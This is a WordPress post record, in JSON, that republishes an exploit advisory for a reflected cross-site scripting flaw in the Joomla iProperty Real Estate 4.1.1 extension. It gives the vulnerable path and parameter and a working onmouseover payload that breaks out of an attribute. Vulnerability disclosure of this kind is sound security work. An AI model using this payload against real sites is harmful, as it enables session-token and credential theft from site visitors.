{"id":45895,"date":"2023-07-31T21:28:43","date_gmt":"2023-07-31T17:28:43","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173835\/joomlaipropertyrealestate411-xss.txt"},"modified":"2023-08-02T13:37:30","modified_gmt":"2023-08-02T09:07:30","slug":"joomla-iproperty-real-estate-4-1-1-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/joomla-iproperty-real-estate-4-1-1-cross-site-scripting\/","title":{"rendered":"Joomla iProperty Real Estate 4.1.1 Cross Site Scripting"},"content":{"rendered":"<p># Exploit Title: Joomla iProperty Real Estate 4.1.1 &#8211; Reflected XSS<br \/>\n# Exploit Author: CraCkEr<br \/>\n# Date: 29\/07\/2023<br \/>\n# Vendor: The Thinkery LLC<br \/>\n# Vendor Homepage: http:\/\/thethinkery.net<br \/>\n# Software Link: https:\/\/extensions.joomla.org\/extension\/vertical-markets\/real-estate\/iproperty\/<br \/>\n# Demo: https:\/\/iproperty.thethinkery.net\/<br \/>\n# Tested on: Windows 10 Pro<br \/>\n# Impact: Manipulate the content of the site<\/p>\n<p>## Greetings<\/p>\n<p>The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br \/>\nCryptoJob (Twitter) twitter.com\/0x0CryptoJob<\/p>\n<p>## Description<\/p>\n<p>The attacker can send to victim a link containing a malicious URL in an email or instant message<br \/>\ncan perform a wide variety of actions, such as stealing the victim&#8217;s session token or login credentials<\/p>\n<p>Path: \/iproperty\/property-views\/all-properties-with-map<\/p>\n<p>GET parameter &#8216;filter_keyword&#8217; is vulnerable to XSS<\/p>\n<p>https:\/\/website\/iproperty\/property-views\/all-properties-with-map?filter_keyword=[XSS]&#038;option=com_iproperty&#038;view=allproperties&#038;ipquicksearch=1<\/p>\n<p>XSS Payload: pihil&#8221;onmouseover=&#8221;alert(1)&#8221;style=&#8221;position:absolute;width:100%;height:100%;top:0;left:0;&#8221;f63m4<\/p>\n[-] Done<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Joomla iProperty Real Estate 4.1.1 &#8211; Reflected XSS # Exploit Author: CraCkEr # Date: 29\/07\/2023 # Vendor: The Thinkery LLC # Vendor Homepage: http:\/\/thethinkery.net # Software Link: https:\/\/extensions.joomla.org\/extension\/vertical-markets\/real-estate\/iproperty\/ # Demo: https:\/\/iproperty.thethinkery.net\/ # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45895","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45895"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45895\/revisions"}],"predecessor-version":[{"id":45992,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45895\/revisions\/45992"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}